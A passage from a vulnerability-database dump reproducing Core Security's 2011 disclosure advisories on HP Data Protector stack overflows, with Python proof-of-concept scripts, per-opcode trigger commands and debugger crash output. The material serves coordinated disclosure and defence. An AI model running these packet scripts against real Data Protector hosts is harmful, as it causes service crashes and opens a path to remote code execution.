"2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71823", "id": "SSV:71823", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the "data protector inet" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . 
Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. 
*Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join(["%s\\x00" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = ["\\xff\\xfe\\x32\\x00\\x00\\x00"]\r\n\r\nfor s in args:\r\n packet.append("\\x20\\x00" + s + "\\x00\\x00")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(">L", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 10000 30 17"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. 
Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 42 10000 30 9"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 46 10000 30 17"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 27 10000 30 3"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerability 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 17 10000 30 6"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. 
Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 1 7 6"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 20 1 7 6"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n. 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 
2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. 
Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71823"}, {"lastseen": "2017-11-19T15:44:57", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71826", "id": "SSV:71826", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n 
HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\nAdvisory ID: CORE-2011-0606\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1866\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. A vulnerability in HP Data\r\nProtector could allow a remote attacker to execute arbitrary code. The\r\nvulnerability is triggered by sending a request to port 5555 of a host\r\nrunning the "data protector inet" service, part of HP Data Protector.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to this issue. HP\r\nhas provided the following procedure to mitigate this vulnerability:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. 
Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Nahuel C. Riva from\r\nCore Security Technologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the bug.\r\n\r\n/-----\r\nimport sys\r\nimport socket\r\n\r\nfrom struct import pack\r\n\r\nip = sys.argv[1]\r\nport = int(sys.argv[2]) # default tcp port 5555\r\n\r\ntarget = (ip, port)\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(target)\r\n\r\npath = 'A' * 5000\r\n\r\npacket = pack('<L', 0x20003220)\r\npacket += pack('<L', 0x00302000)\r\npacket += '\\x20'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('<L', 0x00432000)\r\npacket += pack('<L', 0x00303220)\r\npacket += '\\x20'\r\npacket += 'omnicheck.exe'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('>H', 0x0020) * 4\r\npacket += pack('<L', 0x30200030)\r\npacket += pack('>H', 0x0020)\r\npacket += path\r\npacket += pack('>H', 0x0000)\r\n\r\nplen = pack('>L', len(packet))\r\n\r\ns.send(plen + packet)\r\n\r\n- -----/\r\n By executing this script, the omniinet.exe process crashes in the\r\nfollowing EIP:\r\n\r\n/-----\r\n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP]\r\n7C8285D6 8BE5 MOV ESP,EBP\r\n7C8285D8 5D POP EBP\r\n7C8285D9 C3 RETN\r\n \r\n- -----/\r\n This is part of a function inside the ntdll.dll library, however, if we\r\nlook the SEH chain, we can see that the SEH handler was overwritten with\r\nthe value 0x00410041 (the unicode value for "AA"):\r\n\r\n/-----\r\nSEH chain of thread 00000578\r\nAddress SE handler\r\n009AFF94 omniinet.00410041\r\n00410041 A3004472\r\n \r\n- -----/\r\n The following are the values of the CPU registers at the 
time of the\r\ncrash:\r\n\r\n/-----\r\nEAX C0000008\r\nECX 009AEC98\r\nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher\r\nEBX 0015B480\r\nESP 009AEC44\r\nEBP 009AEC94\r\nESI 00155A80\r\nEDI 00000000\r\nEIP 7C8285D3 ntdll.7C8285D3\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 0 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDB000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr ERROR_SUCCESS (00000000)\r\nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)\r\nST0 empty 0.0\r\nST1 empty 0.0\r\nST2 empty 0.0\r\nST3 empty 0.0\r\nST4 empty 0.0\r\nST5 empty 0.0\r\nST6 empty 0.7610000000000000098\r\nST7 empty 1.0000000000000000000\r\n 3 2 1 0 E S P U O Z D I\r\nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n \r\n- -----/\r\n The problem is in the 0041D170 function. This function does a blind\r\ncopy of the string passed in the packet as a path:\r\n\r\n/-----\r\n0041D170 /$ 55 PUSH EBP\r\n0041D171 |. 8BEC MOV EBP,ESP\r\n0041D173 |. 51 PUSH ECX\r\n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\r\n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]\r\n0041D180 |. 85D2 TEST EDX,EDX\r\n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7\r\n[...]\r\n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C]\r\n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]\r\n0041D1FD |. 85C9 |TEST ECX,ECX\r\n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227\r\n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX\r\n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX]\r\n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs\r\nto the stack\r\n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D216 |. 83C0 02 |ADD EAX,2\r\n0041D219 |. 
8945 08 |MOV DWORD PTR SS:[EBP+8],EAX\r\n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D21F |. 83C1 02 |ADD ECX,2\r\n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX\r\n0041D225 |.^EB D0 \\JMP SHORT omniinet.0041D1F7\r\n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0\r\n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n0041D232 |. 8BE5 MOV ESP,EBP\r\n0041D234 |. 5D POP EBP\r\n0041D235 \\. C3 RETN\r\n \r\n- -----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-06:\r\nCore Security Technologies notifies the HP team of the vulnerabilities\r\nand provides the technical details. Publication date is temporarily set\r\nto July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0606 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. 
*About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay\r\nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo\r\n=zHon\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71826"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:29", "description": "", "published": "2011-06-30T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2011.0514", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "modified": "2011-06-30T00:00:00", "id": "PACKETSTORM:102673", "href": "https://packetstormsecurity.com/files/102673/Core-Security-Technologies-Advisory-2011.0514.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nMultiple vulnerabilities in HP Data Protector \n \n \n1. *Advisory Information* \n \nTitle: Multiple vulnerabilities in HP Data Protector \nAdvisory ID: CORE-2011-0514 \nAdvisory URL: \nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities \nDate published: 2011-06-29 \nDate of last update: 2011-06-29 \nVendors contacted: HP \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Remote stack overflow [CWE-120], Null pointer dereference \n[CWE-476], Improper input validation [CWE-20] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515 \n \n \n3. 
*Vulnerability Description* \n \nHP Data Protector [1] is an automated backup and recovery software for \nsingle-server to enterprise environments. Multiple vulnerabilities have \nbeen found in HP Data Protector that could allow a remote attacker to \nexecute arbitrary code and lead to denial of service conditions. The \nvulnerabilities are triggered by sending a request to port 5555 of a \nhost running the \"data protector inet\" service, part of HP Data \nProtector. The request has several parameters, including an opcode. By \nsending requests with specially crafted parameters, the different bugs \ncan be triggered. \n \n \n4. *Vulnerable packages* \n \n. HP OpenView Storage Data Protector v6.20 (running on Windows). \n. HP OpenView Storage Data Protector v6.11 (running on Windows). \n. HP OpenView Storage Data Protector v6.10 (running on Windows). \n. HP OpenView Storage Data Protector v6.00 (running on Windows). \n. Previous versions may be affected, but were not tested. \n \n \n5. *Non-vulnerable packages* \n \n. No fixes are available at the time of publication. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nHP has issued a security bulletin with document ID c02872182 [2] \navailable through HP Support Center at http://www.hp.com/go/HPSC. \n \nThe latest version of HP Data Protector is vulnerable to these issues. \nHP has provided the following procedure to mitigate these vulnerabilities: \n \n1. Upgrade to Data Protector A.06.20 or subsequent. \n2. Enable encrypted control communication services on cell server and \nall clients in cell. \n \nThe upgrade is available for download from \nhttp://hp.com/go/dataprotector then under 'Product Information' click on \n'Trials and Demos'. \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered by Oren Isacson from Core Security \nTechnologies. Publication was coordinated by Carlos Sarraute. \n \n \n8. 
*Technical Description / Proof of Concept Code* \n \nThe following python script can be used to reproduce the different bugs. \n \n/----- \nimport struct, socket, sys \n \ntarget = sys.argv[1] \nopcode = sys.argv[2] \nstring_lenght = int(sys.argv[3]) \nargs_number = int(sys.argv[4]) \nlong_argument = int(sys.argv[5]) \n \ndef to_wc(x): \nreturn ''.join([\"%s\\x00\" % c for c in x] ) \n \nargs = [to_wc('a')] * args_number \nargs[5] = to_wc(opcode) \nargs[long_argument] = 'a' * string_lenght \npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"] \n \nfor s in args: \npacket.append(\"\\x20\\x00\" + s + \"\\x00\\x00\") \n \npacket = ''.join(packet) \npacket = struct.pack(\">L\", len(packet)) + packet \n \nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \nsock.connect((target, 5555)) \nsock.send(packet) \n \n- -----/ \n \n \nIn the following sections, we give the command line details to reproduce \neach bug, and a brief description of the effect produced. \n \n \n8.1. *Vulnerability 1. Opcodes 20 y 28.* \n \n[CVE-2011-1865] This vulnerability can be reproduced with any of the \nfollowing commands: \n\"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\" \nThis causes a stack overflow. \n \n/----- \n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3 \n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52 \n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35 \n61616161 00000000 00000000 00000000 00000000 0x61616161 \n \n- -----/ \n \n \n \n8.2. *Vulnerability 2. Opcode 11.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 11 10000 30 17\" \nA stack overflow is produced within the function swprintf, called from \nposition 0x00411A72. \n \n \n8.3. *Vulnerability 3. 
Opcode 35.* \n \n[CVE-2011-1865] This vulnerability can be reproduced with any of the \nfollowing commands: \n\"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\" \nA stack overflow is produced within the function swprintf, called from \nposition 0041367F. \n \n \n8.4. *Vulnerability 4. Opcode 42.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 42 10000 30 9\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040A9BA. \n \n \n8.5. *Vulnerability 5. Opcode 46.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 46 10000 30 17\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040A708. \n \n \n8.6. *Vulnerability 6. Opcode 27.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 27 10000 30 3\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040AD53. \n \n \n8.7. *Vulnerabilidad 7. Opcode 17.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 17 10000 30 6\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040FC05. \n \n \n8.8. *Vulnerability 8. Opcode 11.* \n \n[CVE-2011-1514] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 11 1 7 6\" \nThis causes a null pointer dereference. \n \n/----- \neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490 \nedi=00000000 \neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac \npe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \nefl=00010212 \nomniinet+0x7ed0: \n00407ed0 8b10 mov edx,[eax] \nds:0023:00000014=???????? 
